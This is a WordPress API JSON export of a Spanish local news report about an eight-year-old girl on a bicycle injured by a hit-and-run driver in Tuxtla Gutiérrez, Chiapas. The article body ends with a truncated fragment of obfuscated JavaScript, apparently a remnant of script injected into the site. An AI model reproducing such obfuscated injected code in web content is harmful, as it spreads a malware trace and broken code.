{"id":1192,"date":"2022-04-09T02:15:04","date_gmt":"2022-04-09T02:15:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1192"},"modified":"2022-04-09T02:15:05","modified_gmt":"2022-04-09T02:15:05","slug":"menor-de-8-anos-resulta-herida-al-ser-atropellada-en-la-calzada-al-sumidero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1192","title":{"rendered":"Menor de 8 a\u00f1os resulta herida al ser atropellada en la calzada al sumidero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649470373067-1024x768.jpg\" alt=\"\" class=\"wp-image-1193\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649470373067-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649470373067-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649470373067-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/FB_IMG_1649470373067.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 8 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; Una ni\u00f1a de aproximadamente ocho a\u00f1os de edad result\u00f3 herida al ser atropellada este viernes por la tarde por un autom\u00f3vil que se di\u00f3 a la fuga sobre la Calzada al Sumidero en la zona Oriente de Tuxtla.<\/p>\n\n\n\n<p>De acuerdo con los reportes extraoficiales la ni\u00f1a se atraves\u00f3 en esta transitada v\u00eda sin precaucion a la altura de la Calle Huachipil\u00edn en la Colonia Albania Baja.<\/p>\n\n\n\n<p>La ni\u00f1a que manejaba bicicleta qued\u00f3 tendida en el pavimento la cual fue auxiliada por los vecinos que llamaron a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>La madre desesperada pidi\u00f3 su pronta atenci\u00f3n m\u00e9dica y fue trasladada a un nosocomio.<\/p>\n\n\n\n<p>Sobre el responsable nadie se supo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 8 de abril del 2022. Tuxtla Guti\u00e9rrez. &#8211; Una ni\u00f1a de aproximadamente ocho a\u00f1os de edad result\u00f3 herida al ser atropellada este viernes por la tarde por un autom\u00f3vil que se di\u00f3 a la fuga sobre la Calzada al Sumidero en la zona Oriente de Tuxtla. De acuerdo con los reportes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1193,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1192","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1192"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1192\/revisions"}],"predecessor-version":[{"id":1194,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1192\/revisions\/1194"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1193"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1192"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}